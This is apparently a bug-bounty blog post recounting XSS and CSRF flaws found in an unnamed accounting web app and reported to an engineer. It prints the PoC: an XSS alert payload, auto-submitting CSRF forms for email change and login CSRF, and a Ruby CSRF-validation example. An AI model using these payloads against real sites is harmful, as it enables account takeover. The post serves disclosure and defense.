How I made $2000 in 15 minutes

When I am not hunting, I read about startups and what's happening in the Valley. I check their sites, and as a security guy I cannot stop myself from checking their security too. In the process I came across an accounting web application (they are quite famous and making big bucks; I won't name them, as they might get disturbed after this post). I was just testing for the common bugs: XSS, CSRF and all the regular stuff.

Every field was vulnerable to XSS, and every form was vulnerable to CSRF because the token was not being validated. I used the Contact Us section of the site to report it. Some non-technical lady replied: "Thanks for contacting us, we don't have any reward scheme or anything."

Let's give it one more try. This time I used the About Us page, googled the name of an engineer, found his GitHub account and found his Gmail address there. He was really nice to me. Later we had a video chat on Skype; he explained things to me and asked about my background. He was impressed.

The following is a copy-paste of the original PoC that I sent back then:

1. XSS: JavaScript is not filtered, hence arbitrary JavaScript code can be executed. With document.cookie a user's cookie can be stolen, which can lead to full account takeover. Steps to reproduce: enter the following as your first or last name:

";</script><script>alert(/XSS/)</script><

2. CSRF: the CSRF token on the update profile form is not validated on the server side, hence a user's email can be changed by any attacker. This can later be used to abuse the forgot-password flow and take over the whole account. Steps to reproduce:

1. Log in to your account and copy the code below into test.html, then open test.html. The following code will change your name to Manish Bhattacharya as well as your email:

<html>
<head>
<title>test for csrf</title>
</head>
<body>
<form method="POST" action="" name="manish">
<input type="hidden" name="_method" value="put" />
<input type="hidden" name="user[first_name]" value="Manish" />
<input type="hidden" name="user[last_name]" value="Bhattacharya" />
<input type="hidden" name="user[email]" value="" />
<input type="hidden" name="user[time_zone]" value="Pacific+Time+%28US+%26+Canada%29" />
</form>
<script> document.manish.submit(); </script>
</body>
</html>



3. There is no CSRF token on the logout form, and the login form's CSRF token is not validated on the server side. An attacker can abuse this to log a victim into the attacker's own account, monitor the victim's activity and gain sensitive information.

Steps to reproduce: log in to your account and copy the following code into test1.html, then open test1.html. You will be logged out and logged in to my account automatically.



<html>
<head>
<title>test for csrf</title>
</head>
<body>
<img src="" />
<form method="POST" action="" name="manish">
<input type="hidden" name="user[email]" value="" />
<input type="hidden" name="user[password]" value="hello12345" />
<input type="hidden" name="commit" value="Log+in" />
</form>
<script> document.manish.submit(); </script>
</body>
</html>



4. There is no X-Frame-Options header on the site. X-Frame-Options restricts framing of the site; most web applications use it to protect their users, and the absence of such a header can enable clickjacking attacks against the users.

He got back after 2 days with this: (screenshot)

I was like: (rich snob meme; sorry 😦 Mr. Gates 😛, nothing personal).
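As an added example (not from the original post or the company's code), here is the server-side validation whose absence items 2 to 4 of the PoC exploited: one random token per session, checked in constant time on every state-changing request, login and logout included, plus the anti-framing headers. The session hash, the authenticity_token parameter name and the Rails-style _method override handling are assumptions.

```ruby
require 'securerandom'

# Server-side CSRF guard modelled on what the PoC exploited: a token
# that was issued but never checked, a login form without one, and a
# missing X-Frame-Options header.
module CsrfGuard
  # Only state-changing methods need a token; GET/HEAD are exempt.
  STATE_CHANGING = %w[POST PUT PATCH DELETE].freeze

  # Issue one random token per session (hypothetical session hash).
  # Issue it on the login page too, so login POSTs can be checked.
  def self.issue_token(session)
    session[:csrf_token] ||= SecureRandom.hex(32)
  end

  # Honour the Rails-style _method override used by test.html
  # (POST + _method=put is really a PUT) before deciding.
  def self.effective_method(http_method, params)
    override = params["_method"]
    m = http_method.to_s.upcase
    m = override.to_s.upcase if m == "POST" && override
    m
  end

  # Reject any state-changing request whose token is absent or does not
  # match the session's token. Every form must pass through here, and
  # logout must be a POST that does too, not a GET an <img> can trigger.
  def self.valid_request?(session, http_method, params)
    return true unless STATE_CHANGING.include?(effective_method(http_method, params))
    expected = session[:csrf_token]
    given    = params["authenticity_token"]
    return false if expected.nil? || given.nil?
    secure_compare(expected, given)
  end

  # Constant-time comparison so the check leaks no timing information.
  def self.secure_compare(a, b)
    return false unless a.bytesize == b.bytesize
    diff = 0
    a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
    diff.zero?
  end

  # Response headers that stop the page from being framed (item 4).
  def self.security_headers
    { "X-Frame-Options" => "DENY",
      "Content-Security-Policy" => "frame-ancestors 'none'" }
  end
end
```

Feed valid_request? the fields of test.html (a POST with _method=put and no authenticity_token) and it returns false; the same form carrying the session's token passes.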

I reported various issues for free after this, and I still have a good relationship with the company's people. It took me hardly 10 or 15 minutes to find those general bugs.

P.S. – Don't ask me the name of the company, I won't tell 😦

Logging off…


2 thoughts on "How I made $2000 in 15 minutes"

  1. Have you considered writing a tutorial about finding and abusing CSRF vulnerabilities in web applications? For instance, your strategy for looking for CSRF bugs in web applications.
